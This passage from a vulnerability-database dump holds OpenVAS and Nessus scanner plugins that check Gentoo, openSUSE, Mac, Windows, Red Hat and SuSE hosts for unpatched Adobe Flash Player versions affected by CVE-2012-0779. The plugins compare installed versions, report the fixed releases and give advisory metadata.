Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities have been found in Adobe Flash Player\ncould result in the execution of arbitrary code or Denial of Service.\";\ntag_solution = \"All Adobe Flash Player users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-plugins/adobe-flash-11.2.202.236'\n \n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201206-21\nhttp://bugs.gentoo.org/show_bug.cgi?id=414603\nhttp://bugs.gentoo.org/show_bug.cgi?id=420311\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201206-21.\";\n\n \n \nif(description)\n{\n script_id(71588);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2012-0779\", \"CVE-2012-2034\", \"CVE-2012-2035\", \"CVE-2012-2036\", \"CVE-2012-2037\", \"CVE-2012-2038\", \"CVE-2012-2039\", \"CVE-2012-2040\");\n script_version(\"$Revision: 6589 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 10:27:50 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-10 03:22:56 -0400 (Fri, 10 Aug 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201206-21 (Adobe Flash Player)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 11.2.202.236\"), vulnerable: make_list(\"lt 11.2.202.236\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:21:22", "bulletinFamily": "scanner", "description": "flash-player update to 11.2.202.235 fixes a potential remote code execution vulnerability", "modified": "2018-11-10T00:00:00", "id": "OPENSUSE-2012-262.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=74617", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2012:0594-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-262.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74617);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/11/10 11:50:00\");\n\n script_cve_id(\"CVE-2012-0779\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2012:0594-1)\");\n script_summary(english:\"Check for the openSUSE-2012-262 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"flash-player update to 11.2.202.235 fixes a potential remote code\nexecution vulnerability\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=758645\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=760777\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-05/msg00007.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4|SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4 / 12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"flash-player-11.2.202.235-14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"flash-player-gnome-11.2.202.235-14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"flash-player-kde4-11.2.202.235-14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"flash-player-11.2.202.235-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"flash-player-gnome-11.2.202.235-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"flash-player-kde4-11.2.202.235-21.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:16:39", "bulletinFamily": "scanner", "description": "According to its version, the instance of Flash Player installed on the remote Mac OS X host is 10.x equal to or earlier than 10.3.183.18 or 11.x equal to or earlier than 11.2.202.233. It is, therefore, reportedly affected by an object confusion vulnerability that could allow an attacker to crash the application or potentially take control of the target system. \n\nBy tricking a victim into visiting a specially crafted page, an attacker may be able to utilize this vulnerability to execute arbitrary code subject to the users' privileges.", "modified": "2018-07-14T00:00:00", "id": "MACOSX_FLASH_PLAYER_11_2_202_235.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=58995", "published": "2012-05-04T00:00:00", "title": "Flash Player for Mac <= 10.3.183.18 / 11.2.202.233 Object Confusion Vulnerability (APSB12-09)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58995);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\n\n script_cve_id(\"CVE-2012-0779\");\n script_bugtraq_id(53395);\n\n script_name(english:\"Flash Player for Mac <= 10.3.183.18 / 11.2.202.233 Object Confusion Vulnerability (APSB12-09)\");\n script_summary(english:\"Checks version of Flash Player\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Mac OS X host has a browser plugin that is affected by a\ncode execution vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its version, the instance of Flash Player installed on\nthe remote Mac OS X host is 10.x equal to or earlier than 10.3.183.18\nor 11.x equal to or earlier than 11.2.202.233. It is, therefore,\nreportedly affected by an object confusion vulnerability that could\nallow an attacker to crash the application or potentially take control\nof the target system. \n\nBy tricking a victim into visiting a specially crafted page, an\nattacker may be able to utilize this vulnerability to execute\narbitrary code subject to the users' privileges.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb12-09.html\");\n #http://blogs.technet.com/b/mmpc/archive/2012/05/24/a-technical-analysis-of-adobe-flash-player-cve-2012-0779-vulnerability.aspx\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ba4bc112\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to Adobe Flash Player version 10.3.183.19 / 11.2.202.235 or\nlater.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\n\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\ntenx_cutoff_version = \"10.3.183.18\";\ntenx_fixed_version = \"10.3.183.19\";\nelevenx_cutoff_version = \"11.2.202.233\";\nelevenx_fixed_version = \"11.2.202.235\";\nfixed_version_for_report = NULL;\n\n# 10x\nif (ver_compare(ver:version, fix:tenx_cutoff_version, strict:FALSE) <= 0)\n fixed_version_for_report = tenx_fixed_version;\n\n# 11x\nif (\n version =~ \"^11\\.\" &&\n ver_compare(ver:version, fix:elevenx_cutoff_version, strict:FALSE) <= 0\n) fixed_version_for_report = elevenx_fixed_version;\n\nif (!isnull(fixed_version_for_report))\n{\n if (report_verbosity > 0)\n {\n report = \n '\\n Installed version : ' + version + \n '\\n Fixed version : '+fixed_version_for_report+'\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Flash Player for Mac\", version);\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:16:39", "bulletinFamily": "scanner", "description": "According to its version, the instance of Flash Player installed on the remote Windows host is 10.x equal to or earlier than 10.3.183.18 or 11.x equal to or earlier than 11.2.202.233. It is, therefore, reportedly affected by an object confusion vulnerability that could allow an attacker to crash the application or potentially take control of the target system. \n\nBy tricking a victim into visiting a specially crafted page, an attacker may be able to utilize this vulnerability to execute arbitrary code subject to the users' privileges.", "modified": "2018-07-11T00:00:00", "id": "FLASH_PLAYER_APSB12-09.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=58994", "published": "2012-05-04T00:00:00", "title": "Flash Player <= 10.3.183.18 / 11.2.202.233 Object Confusion Vulnerability (APSB12-09)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58994);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/07/11 17:09:26\");\n\n script_cve_id(\"CVE-2012-0779\");\n script_bugtraq_id(53395);\n\n script_name(english:\"Flash Player <= 10.3.183.18 / 11.2.202.233 Object Confusion Vulnerability (APSB12-09)\");\n script_summary(english:\"Checks version of Flash Player\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Windows host has a browser plugin that is affected by a\ncode execution vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its version, the instance of Flash Player installed on\nthe remote Windows host is 10.x equal to or earlier than 10.3.183.18\nor 11.x equal to or earlier than 11.2.202.233. It is, therefore,\nreportedly affected by an object confusion vulnerability that could\nallow an attacker to crash the application or potentially take control\nof the target system. \n\nBy tricking a victim into visiting a specially crafted page, an\nattacker may be able to utilize this vulnerability to execute\narbitrary code subject to the users' privileges.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb12-09.html\");\n #http://blogs.technet.com/b/mmpc/archive/2012/05/24/a-technical-analysis-of-adobe-flash-player-cve-2012-0779-vulnerability.aspx\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ba4bc112\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to Adobe Flash Player version 10.3.183.19 / 11.2.202.235 or\nlater.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (make_list(\"Plugin\", \"ActiveX\", \"Chrome\"))\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n if (!isnull(vers) && !isnull(files))\n {\n foreach key (keys(vers))\n {\n ver = vers[key];\n\n if (ver)\n {\n iver = split(ver, sep:'.', keep:FALSE);\n for (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n if (\n # 10.x <= 10.3.183.18\n (\n iver[0] == 10 &&\n (\n iver[1] < 3 ||\n (\n iver[1] == 3 &&\n (\n iver[2] < 183 ||\n (iver[2] == 183 && iver[3] <= 18)\n )\n )\n )\n )\n ||\n (\n # 11.x <= 11.2.202.233\n iver[0] == 11 &&\n (\n iver[1] < 2 ||\n (\n iver[1] == 2 &&\n (\n iver[2] < 202 ||\n (iver[2] == 202 && iver[3] <= 233)\n )\n )\n )\n )\n )\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product: Browser Plugin (for Firefox / Netscape / Opera)';\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n }\n else if (variant == \"Chrome\")\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : 10.3.183.19 / 11.2.202.235';\n info += '\\n';\n }\n }\n }\n }\n}\n\nif (info)\n{\n if (report_verbosity > 0)\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:info);\n else\n security_hole(get_kb_item(\"SMB/transport\"));\n}\nelse\n{ \n if (thorough_tests) \n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:16:44", "bulletinFamily": "scanner", "description": "An updated Adobe Flash Player package that fixes one security issue is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This vulnerability is detailed on the Adobe security page APSB12-09, listed in the References section. Specially crafted SWF content could cause flash-plugin to crash or, potentially, execute arbitrary code when a victim loads a page containing the specially crafted SWF content.\n(CVE-2012-0779)\n\nAll users of Adobe Flash Player should install this updated package, which upgrades Flash Player to version 10.3.183.19.", "modified": "2018-11-26T00:00:00", "id": "REDHAT-RHSA-2012-0688.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=59253", "published": "2012-05-24T00:00:00", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2012:0688)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0688. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(59253);\n script_version (\"1.24\");\n script_cvs_date(\"Date: 2018/11/26 11:02:15\");\n\n script_cve_id(\"CVE-2012-0779\");\n script_bugtraq_id(53395);\n script_xref(name:\"RHSA\", value:\"2012:0688\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2012:0688)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes one security issue is\nnow available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This\nvulnerability is detailed on the Adobe security page APSB12-09, listed\nin the References section. Specially crafted SWF content could cause\nflash-plugin to crash or, potentially, execute arbitrary code when a\nvictim loads a page containing the specially crafted SWF content.\n(CVE-2012-0779)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 10.3.183.19.\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb12-09.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb12-09.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0688\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0779\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0688\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-10.3.183.19-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-10.3.183.19-1.el6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:18:20", "bulletinFamily": "scanner", "description": "Flash Player was updated to version 11.2.202.233, fixing a critical security problem.\n\nThis update also fixes a problem with NVIDIA accelerated drivers and swapped blue/red colors, and also a printing regression introduced by a previous update.", "modified": "2013-11-19T00:00:00", "id": "SUSE_11_FLASH-PLAYER-120506.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64137", "published": "2013-01-25T00:00:00", "title": "SuSE 11.1 Security Update : flash-player (SAT Patch Number 6253)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64137);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2013/11/19 11:21:01 $\");\n\n script_cve_id(\"CVE-2012-0779\");\n\n script_name(english:\"SuSE 11.1 Security Update : flash-player (SAT Patch Number 6253)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Flash Player was updated to version 11.2.202.233, fixing a critical\nsecurity problem.\n\nThis update also fixes a problem with NVIDIA accelerated drivers and\nswapped blue/red colors, and also a printing regression introduced by\na previous update.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757428\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=758645\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=760777\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-0779.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 6253.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Object Type 